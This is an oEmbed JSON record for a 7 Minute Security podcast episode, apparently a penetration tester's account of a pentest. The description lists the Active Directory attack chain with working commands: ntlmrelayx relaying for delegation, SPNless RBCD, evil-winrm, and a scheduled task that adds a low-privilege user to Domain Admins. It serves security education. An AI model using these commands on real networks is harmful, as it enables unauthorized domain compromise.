{"version":1,"type":"rich","provider_name":"Libsyn","provider_url":"https:\/\/www.libsyn.com","height":90,"width":600,"title":"7MS #691: Tales of Pentest Pwnage \u2013 Part 75","description":"Holy schnikes, today might be my favorite tale of pentest pwnage ever. Do I say that almost every episode? yes. Do I mean it? Yes. Here are all the commands\/links to supplement today\u2019s episode:  Got an SA account to a SQL server through&amp;nbsp;Snaffler-ing With that SA account, I learned how to coerce Web auth from within a SQL shell \u2013 read more about that&amp;nbsp;here I relayed that Web auth with&amp;nbsp;ntlmrelayx -smb2support -t ldap:\/\/dc --delegate-access --escalate-user lowpriv I didn\u2019t have a machine account under my control, so I did SPNless RBCD on my lowpriv account \u2013 read more about that&amp;nbsp;here Using that technique, I requested a host service ticket for the SQL box, then used evil-winrm to remote in using the ticket From there I checked out who had interactive logons:&amp;nbsp;Get-Process -IncludeUserName explorer | Select-Object UserName Then I queued up a fake task to elevate me to DA:&amp;nbsp;schtasks \/create \/tn &quot;TotallyFineTask&quot; \/tr 'net group &quot;Domain Admins&quot; lowpriv \/add \/domain' \/sc once \/st 12:00 \/ru &quot;DOMAIN\\a-domain-admin&quot; \/it \/f \u2026and ran it:&amp;nbsp;schtasks \/run \/tn &quot;TotallyFineTask&quot;  ","author_name":"7 Minute Security","author_url":"https:\/\/7MinSec.com","html":"<iframe title=\"Libsyn Player\" style=\"border: none\" src=\"\/\/html5-player.libsyn.com\/embed\/episode\/id\/38086380\/height\/90\/theme\/custom\/thumbnail\/yes\/direction\/forward\/render-playlist\/no\/custom-color\/88AA3C\/\" height=\"90\" width=\"600\" scrolling=\"no\"  allowfullscreen webkitallowfullscreen mozallowfullscreen oallowfullscreen msallowfullscreen><\/iframe>","thumbnail_url":"https:\/\/assets.libsyn.com\/secure\/item\/38086380"}